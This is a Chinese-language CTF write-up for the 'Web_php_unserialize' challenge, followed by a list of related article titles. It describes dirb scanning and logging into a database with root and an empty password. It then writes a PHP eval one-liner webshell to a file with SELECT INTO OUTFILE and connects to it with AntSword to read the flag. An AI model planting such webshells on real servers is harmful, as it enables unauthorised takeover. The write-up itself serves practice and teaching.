打开靶场地址,我们看到是一个php代码

我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件

扫描可以得出该网站下的文件,我将它复制在记事本中

发现一个数据库网站

获取到账号为root密码为空

登录数据库,在SQL出编写一句话木马,并执行。

SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'

接下来我们使用中国蚁剑,链接我们所编写的木马,

SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'

//红色字体为链接密码,绿色字体为木马文件路径。

链接成功后,我们可以直接在蚁剑中,查看该数据库中的文件,发现flag

第二种方法:

根据题目源代码可知 过滤了 php:// 大小写绕过呗

构造 payload,抓包

在数据包中添加一个PHP的函数

然后cat flag那个文件,查看内容:

拿到flg............

CTF Web_php_unserialize 详细解题过程相关推荐

  1. 攻防世界warmup新人小白友好向详细解题过程

    攻防世界warmup新人小白详细解题过程 思路:查看网页源码发现提示信息,/source.php 进行代码审计 ,主要函数找出,PHP函数记住,自己构造PAYLOAD 声明:菜菜级的水平,解析有错的不 ...

  2. 某次 ctf Mobile 0x01 解题过程

    文章目录 题目 一.解题过程及代码分析 代码分析 Judge() 函数分析 b.a() 函数分析及还原 b.b() 函数分析: a.a() 函数分析 a.a()混淆函数还原 总结 前言:同学发来了一个 ...

  3. CTF 关于ZIP解题过程

    CTF 关于ZIP解题 1.伪加密类型 打开之后是两张图片,一张未加密,一张已加密. 利用WinHex打开 然后在谷歌上找到大佬关于zip格式的介绍 接下来进行对比,看是否属于伪加密 通过对比,发现确 ...

  4. 第三届长安杯解析(2次修订版)镜像+具体解析+个人详细解题过程,涉及多个模块,我会努力把所有写好,可以做一下题目,提升很明显。

    第一次写的太烂了,看到其他大佬写的我很羞愧,所以努力修订. 长安杯链接: 链接:https://pan.baidu.com/s/1PIJpKRpn5H94_bxbOJIO0w?pwd=ybww 提取码 ...

  5. 逆向查找_CTFer成长之路--一道数独逆向题目解题过程(算法分析、查找线索)...

    前言 CTF 是实战性很强的赛事.仅学习理论知识,不进行实操,永远无法成为 CTF 大神.本次博客为大家解读一道数独相关的逆向,讲解解题过程,总结知识点(CTF中的套路). 题目介绍 本次选择的是出自 ...

  6. CTF学习-密码学解题思路

    CTF学习-密码学解题思路 密码学持续更新 密码学概述 密码学的发展 第一个阶段是从古代到19世纪末-古典密码 (classical cryptography) 第二个阶段从20世纪初到1949年-近 ...

  7. CTF学习-逆向解题思路

    CTF学习-逆向解题思路 持续更新 一.通用过程 通过file命令查看文件类型,判断是ELF还是PE,32位还是64位. 通过strings并重定向标准输出,然后搜索大括号 { ,看看是否能直接得到f ...

  8. 猿人学12题超详细解题思路-入门级js(base64编码)

    前言:服务器为了防止获取他们的数据,可谓是使用各种方法,js逆向可以很方便的解析出来一些加密数据,毕竟道高一尺魔高一丈,今天告诉大家袁人学第12题的解题思路,超详细解题思路. 需求:          ...

  9. CTFer成长之路--一道历届逆向题解题过程(包含脱壳、算法分析)

    前言 CTF 是实战性很强的赛事.仅学习理论知识,不进行实操,永远无法成为 CTF 大神.从本篇博客开始,我将选择有代表性的历年CTF比赛题目,介绍解题过程,工具使用以及讲解知识点. 题目介绍 本次讲 ...

  10. (转载)连连看游戏外挂详细制作过程

    标 题: [原创]新人入手第一个游戏外挂,附上详细制作过程 作 者: caigui 时 间: 2013-01-09,00:56:16 链 接: http://bbs.pediy.com/showthr ...

最新文章

  1. GPT-3到来,程序员会被AI取代吗?
  2. oracle自动冷备份脚本
  3. CallContext和多线程
  4. java国际化——日期和时间+排序
  5. 拆解嘀嗒出行赴港IPO招股书:顺风车市占率近七成 2019年起实现盈利
  6. 常用数据挖掘算法举例(上)
  7. 编写程序,用户输入一个位以上的整数,输出其百位以上的数字。例如用户输入1234.则程序输出12.
  8. AC日记——Flag Codeforces 16a
  9. 从键盘输入5个学生每科分数,把分数保存到一个数组中,最后输出分数大于60分的成绩
  10. SQL:数据库更新语句操作实例
  11. 解决vmrc的连接已断开,正在尝试重新连接
  12. torch.nn.Module.named_parameters(prefix=‘‘, recurse=True)
  13. 电脑加域、exchange邮箱设置、绑定打印机
  14. 【001】快乐数字解题过程记录
  15. java计算机毕业设计教师管理系统源码+mysql数据库+系统+lw文档+部署
  16. Word在试图打开文件时遇到错误。 请尝试下列方法: 检查文档或驱动器的文件权限。 确保有足够的内存和磁盘空间。 用文本恢复转换器打开文件。
  17. IDEA 导入外来jar包并生效(同 Eclipse 中 buid path 效果)
  18. ppt中如何输入四线三格字体
  19. matlab如何与ccs关联,CCS与Matlab
  20. ios浏览器日期不生效

热门文章

  1. AndroidWear官方文档总结01 - 简介
  2. 五大数据统计分析软件
  3. 电池电压测试技术总结
  4. Android 版本对应 Version Code
  5. 支配集(dominating set)问题是NP完全问题的一个证明
  6. 易基因|ChIP-seq分析方法:实用的工作流程和高级应用
  7. Java程序员面试必备的20道数据库面试解析
  8. OLT 的PON口拆分流程
  9. CVPR2014 tracking
  10. 洛谷 P1035 级数求和【二分||枚举】